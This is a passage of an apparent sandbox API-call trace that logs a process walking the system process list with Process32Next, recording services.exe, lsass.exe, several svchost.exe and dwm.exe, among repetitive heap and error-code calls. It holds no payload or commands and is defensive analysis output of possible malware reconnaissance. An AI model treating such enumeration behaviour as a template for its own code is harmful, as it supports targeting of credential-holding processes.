| out: hHeap=0x29a0000) returned 1 [0110.206] GetLastError () returned 0x0 [0110.206] SetLastError (dwErrCode=0x0) [0110.206] GetLastError () returned 0x0 [0110.206] SetLastError (dwErrCode=0x0) [0110.206] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.207] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0580 [0110.207] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d20 [0110.207] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0590 [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.208] GetLastError () returned 0x0 [0110.208] SetLastError (dwErrCode=0x0) [0110.209] GetLastError () returned 0x0 [0110.209] SetLastError (dwErrCode=0x0) [0110.209] GetLastError () returned 0x0 [0110.209] SetLastError (dwErrCode=0x0) [0110.209] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.209] GetLastError () returned 0x0 [0110.209] SetLastError (dwErrCode=0x0) [0110.209] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.209] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0590 | out: hHeap=0x29a0000) returned 1 [0110.209] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.209] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0580 | out: hHeap=0x29a0000) returned 1 [0110.209] GetLastError () returned 0x0 [0110.209] SetLastError (dwErrCode=0x0) [0110.209] GetLastError () returned 0x0 [0110.209] SetLastError (dwErrCode=0x0) [0110.209] GetLastError () returned 0x0 [0110.210] SetLastError (dwErrCode=0x0) [0110.210] GetLastError () returned 0x0 [0110.210] SetLastError (dwErrCode=0x0) [0110.210] GetLastError () returned 0x0 [0110.210] SetLastError (dwErrCode=0x0) [0110.210] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.211] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0580 [0110.211] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970da0 [0110.211] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0590 [0110.211] GetLastError () returned 0x0 [0110.211] SetLastError (dwErrCode=0x0) [0110.211] GetLastError () returned 0x0 [0110.211] SetLastError (dwErrCode=0x0) [0110.211] GetLastError () returned 0x0 [0110.211] SetLastError (dwErrCode=0x0) [0110.211] GetLastError () returned 0x0 [0110.211] SetLastError (dwErrCode=0x0) [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.212] GetLastError () returned 0x0 [0110.212] SetLastError (dwErrCode=0x0) [0110.212] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.212] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0590 | out: hHeap=0x29a0000) returned 1 [0110.212] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.212] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0580 | out: hHeap=0x29a0000) returned 1 [0110.212] GetLastError () returned 0x0 [0110.213] SetLastError (dwErrCode=0x0) [0110.213] GetLastError () returned 0x0 [0110.213] SetLastError (dwErrCode=0x0) [0110.213] GetLastError () returned 0x0 [0110.213] SetLastError (dwErrCode=0x0) [0110.213] GetLastError () returned 0x0 [0110.213] SetLastError (dwErrCode=0x0) [0110.213] GetLastError () returned 0x0 [0110.213] SetLastError (dwErrCode=0x0) [0110.213] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.214] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0580 [0110.215] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c00 [0110.216] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0590 [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.216] GetLastError () returned 0x0 [0110.216] SetLastError (dwErrCode=0x0) [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.217] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.217] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0110.217] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0590 | out: hHeap=0x29a0000) returned 1 [0110.217] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.217] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0580 | out: hHeap=0x29a0000) returned 1 [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.217] GetLastError () returned 0x0 [0110.217] SetLastError (dwErrCode=0x0) [0110.218] GetLastError () returned 0x0 [0110.218] SetLastError (dwErrCode=0x0) [0110.218] GetLastError () returned 0x0 [0110.218] SetLastError (dwErrCode=0x0) [0110.218] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.219] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0580 [0110.219] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970bc0 [0110.219] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a0590 [0110.219] GetLastError () returned 0x0 [0110.219] SetLastError (dwErrCode=0x0) [0110.219] GetLastError () returned 0x0 [0110.219] SetLastError (dwErrCode=0x0) [0110.219] GetLastError () returned 0x0 [0110.219] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.220] GetLastError () returned 0x0 [0110.220] SetLastError (dwErrCode=0x0) [0110.220] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.220] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0590 | out: hHeap=0x29a0000) returned 1 [0110.220] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.220] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0580 | out: hHeap=0x29a0000) returned 1 [0110.221] GetLastError () returned 0x0 [0110.221] SetLastError (dwErrCode=0x0) [0110.221] GetLastError () returned 0x0 [0110.221] SetLastError (dwErrCode=0x0) [0110.221] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x144) returned 0x29a6690 [0110.221] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.221] GetLastError () returned 0x0 [0110.221] SetLastError (dwErrCode=0x0) [0110.221] GetLastError () returned 0x0 [0110.221] SetLastError (dwErrCode=0x0) [0110.221] GetLastError () returned 0x0 [0110.221] SetLastError (dwErrCode=0x0) [0110.221] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.222] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970f40 [0110.222] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e80 [0110.222] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x3970f50 [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.223] GetLastError () returned 0x0 [0110.223] SetLastError (dwErrCode=0x0) [0110.224] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.224] GetLastError () returned 0x0 [0110.224] SetLastError (dwErrCode=0x0) [0110.224] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.224] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f50 | out: hHeap=0x29a0000) returned 1 [0110.224] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e80 | out: hHeap=0x29a0000) returned 1 [0110.224] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0110.224] GetLastError () returned 0x0 [0110.224] SetLastError (dwErrCode=0x0) [0110.224] GetLastError () returned 0x0 [0110.224] SetLastError (dwErrCode=0x0) [0110.224] GetLastError () returned 0x0 [0110.224] SetLastError (dwErrCode=0x0) [0110.224] GetLastError () returned 0x0 [0110.224] SetLastError (dwErrCode=0x0) [0110.224] GetLastError () returned 0x0 [0110.225] SetLastError (dwErrCode=0x0) [0110.225] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.225] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68a8 [0110.226] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970bc0 [0110.226] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.226] GetLastError () returned 0x0 [0110.226] SetLastError (dwErrCode=0x0) [0110.226] GetLastError () returned 0x0 [0110.226] SetLastError (dwErrCode=0x0) [0110.226] GetLastError () returned 0x0 [0110.226] SetLastError (dwErrCode=0x0) [0110.226] GetLastError () returned 0x0 [0110.226] SetLastError (dwErrCode=0x0) [0110.226] GetLastError () returned 0x0 [0110.226] SetLastError (dwErrCode=0x0) [0110.226] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.227] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.227] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6888 | out: hHeap=0x29a0000) returned 1 [0110.227] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.227] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68a8 | out: hHeap=0x29a0000) returned 1 [0110.227] GetLastError () returned 0x0 [0110.227] SetLastError (dwErrCode=0x0) [0110.227] GetLastError () returned 0x0 [0110.228] SetLastError (dwErrCode=0x0) [0110.228] GetLastError () returned 0x0 [0110.228] SetLastError (dwErrCode=0x0) [0110.228] GetLastError () returned 0x0 [0110.228] SetLastError (dwErrCode=0x0) [0110.228] GetLastError () returned 0x0 [0110.228] SetLastError (dwErrCode=0x0) [0110.228] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.229] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.229] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c20 [0110.229] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.230] GetLastError () returned 0x0 [0110.230] SetLastError (dwErrCode=0x0) [0110.231] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.231] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0110.231] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.231] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] GetLastError () returned 0x0 [0110.231] SetLastError (dwErrCode=0x0) [0110.231] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.232] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.232] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0110.232] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.233] GetLastError () returned 0x0 [0110.233] SetLastError (dwErrCode=0x0) [0110.233] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.233] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6928 | out: hHeap=0x29a0000) returned 1 [0110.233] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.234] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.234] GetLastError () returned 0x0 [0110.234] SetLastError (dwErrCode=0x0) [0110.234] GetLastError () returned 0x0 [0110.234] SetLastError (dwErrCode=0x0) [0110.234] GetLastError () returned 0x0 [0110.234] SetLastError (dwErrCode=0x0) [0110.234] GetLastError () returned 0x0 [0110.234] SetLastError (dwErrCode=0x0) [0110.234] GetLastError () returned 0x0 [0110.234] SetLastError (dwErrCode=0x0) [0110.234] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.235] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6978 [0110.235] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970dc0 [0110.235] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.235] GetLastError () returned 0x0 [0110.235] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] GetLastError () returned 0x0 [0110.236] SetLastError (dwErrCode=0x0) [0110.236] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.237] GetLastError () returned 0x0 [0110.237] SetLastError (dwErrCode=0x0) [0110.237] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.237] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0110.237] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.237] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6978 | out: hHeap=0x29a0000) returned 1 [0110.237] GetLastError () returned 0x0 [0110.237] SetLastError (dwErrCode=0x0) [0110.237] GetLastError () returned 0x0 [0110.237] SetLastError (dwErrCode=0x0) [0110.237] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1e6) returned 0x29a69e8 [0110.237] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6690 | out: hHeap=0x29a0000) returned 1 [0110.237] GetLastError () returned 0x0 [0110.237] SetLastError (dwErrCode=0x0) [0110.237] GetLastError () returned 0x0 [0110.237] SetLastError (dwErrCode=0x0) [0110.237] GetLastError () returned 0x0 [0110.238] SetLastError (dwErrCode=0x0) [0110.238] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.239] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0110.239] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970cc0 [0110.239] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.239] GetLastError () returned 0x0 [0110.239] SetLastError (dwErrCode=0x0) [0110.239] GetLastError () returned 0x0 [0110.239] SetLastError (dwErrCode=0x0) [0110.239] GetLastError () returned 0x0 [0110.239] SetLastError (dwErrCode=0x0) [0110.239] GetLastError () returned 0x0 [0110.239] SetLastError (dwErrCode=0x0) [0110.239] GetLastError () returned 0x0 [0110.239] SetLastError (dwErrCode=0x0) [0110.239] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0110.240] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0110.240] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.240] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69a8 | out: hHeap=0x29a0000) returned 1 [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.240] GetLastError () returned 0x0 [0110.240] SetLastError (dwErrCode=0x0) [0110.241] GetLastError () returned 0x0 [0110.241] SetLastError (dwErrCode=0x0) [0110.241] GetLastError () returned 0x0 [0110.241] SetLastError (dwErrCode=0x0) [0110.241] GetLastError () returned 0x0 [0110.241] SetLastError (dwErrCode=0x0) [0110.241] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6868 [0110.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970cc0 [0110.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68a8 [0110.242] GetLastError () returned 0x0 [0110.242] SetLastError (dwErrCode=0x0) [0110.242] GetLastError () returned 0x0 [0110.242] SetLastError (dwErrCode=0x0) [0110.242] GetLastError () returned 0x0 [0110.242] SetLastError (dwErrCode=0x0) [0110.242] GetLastError () returned 0x0 [0110.243] SetLastError (dwErrCode=0x0) [0110.243] GetLastError () returned 0x0 [0110.243] SetLastError (dwErrCode=0x0) [0110.243] GetLastError () returned 0x0 [0110.243] SetLastError (dwErrCode=0x0) [0110.243] GetLastError () returned 0x0 [0110.243] SetLastError (dwErrCode=0x0) [0110.243] GetLastError () returned 0x0 [0110.243] SetLastError (dwErrCode=0x0) [0110.243] GetLastError () returned 0x0 [0110.243] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.243] GetLastError () returned 0x0 [0110.243] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0110.243] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68a8 | out: hHeap=0x29a0000) returned 1 [0110.243] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.243] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6868 | out: hHeap=0x29a0000) returned 1 [0110.243] GetLastError () returned 0x0 [0110.244] GetLastError () returned 0x0 [0110.244] GetLastError () returned 0x0 [0110.244] GetLastError () returned 0x0 [0110.244] GetLastError () returned 0x0 [0110.244] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.245] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6978 [0110.245] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ea0 [0110.245] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6838 [0110.245] GetLastError () returned 0x0 [0110.245] SetLastError (dwErrCode=0x0) [0110.245] GetLastError () returned 0x0 [0110.245] SetLastError (dwErrCode=0x0) [0110.245] GetLastError () returned 0x0 [0110.246] SetLastError 